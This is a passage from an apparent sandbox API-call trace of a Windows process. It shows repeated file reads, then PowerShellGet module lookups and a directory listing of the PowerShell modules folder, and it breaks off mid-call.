lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.399] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x68000 [0113.399] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.399] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x69000 [0113.400] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.400] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x6a000 [0113.400] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.400] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x6b000 [0113.401] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.401] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x6c000 [0113.401] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.401] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x6d000 [0113.401] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.401] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x6e000 [0113.402] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.402] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x6f000 [0113.402] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.402] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x70000 [0113.402] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.402] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x71000 [0113.402] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.403] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x72000 [0113.403] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.403] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x73000 [0113.403] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.403] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x74000 [0113.403] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.403] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x75000 [0113.404] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.404] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x76000 [0113.404] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.404] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x77000 [0113.404] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.404] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x78000 [0113.405] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.405] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x79000 [0113.405] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.405] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x7a000 [0113.405] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.405] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x7b000 [0113.405] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.406] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x7c000 [0113.406] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.406] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x7d000 [0113.406] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.406] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x7e000 [0113.406] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.407] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x7f000 [0113.407] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.407] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x80000 [0113.407] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.407] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x81000 [0113.407] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.408] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x82000 [0113.408] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.408] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x83000 [0113.408] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.408] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x84000 [0113.408] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.409] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x85000 [0113.409] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.409] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x86000 [0113.409] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.409] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x87000 [0113.409] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.409] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x88000 [0113.410] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.410] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x89000 [0113.410] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.410] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x8a000 [0113.410] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.410] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x8b000 [0113.411] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.411] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x8c000 [0113.411] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0xaa9, lpOverlapped=0x0) returned 1 [0113.411] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x8caa9 [0113.411] ReadFile (in: hFile=0x408, lpBuffer=0x240ed6d, nNumberOfBytesToRead=0x157, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ed6d*, lpNumberOfBytesRead=0x5a0d554*=0x0, lpOverlapped=0x0) returned 1 [0113.411] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x8caa9 [0113.411] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x0, lpOverlapped=0x0) returned 1 [0113.427] CloseHandle (hObject=0x408) returned 1 [0114.279] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0114.279] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x55, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x54 [0114.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d2ac) returned 1 [0114.279] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), fInfoLevelId=0x0, lpFileInformation=0x2b2177c | out: lpFileInformation=0x2b2177c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499c9860, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8caa9)) returned 1 [0114.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d2a8) returned 1 [0114.301] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0114.301] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0114.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0a4) returned 1 [0114.301] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2b45cb4 | out: lpFileInformation=0x2b45cb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0114.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0a0) returned 1 [0114.390] EtwEventActivityIdControl () returned 0x0 [0114.393] SetEvent (hEvent=0x404) returned 1 [0114.393] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5a0e884*=0x404, lpdwindex=0x5a0e6a8 | out: lpdwindex=0x5a0e6a8) returned 0x0 [0114.394] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0114.394] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0114.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e764) returned 1 [0114.394] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2b48cc4 | out: lpFileInformation=0x2b48cc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0114.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e760) returned 1 [0114.395] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0114.395] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0114.395] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0114.395] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0114.395] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0114.395] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0114.399] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules")) returned 0x10 [0114.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea74) returned 1 [0114.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0114.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x33, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0114.400] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x5a0e824 | out: lpFindFileData=0x5a0e824*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e320 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, 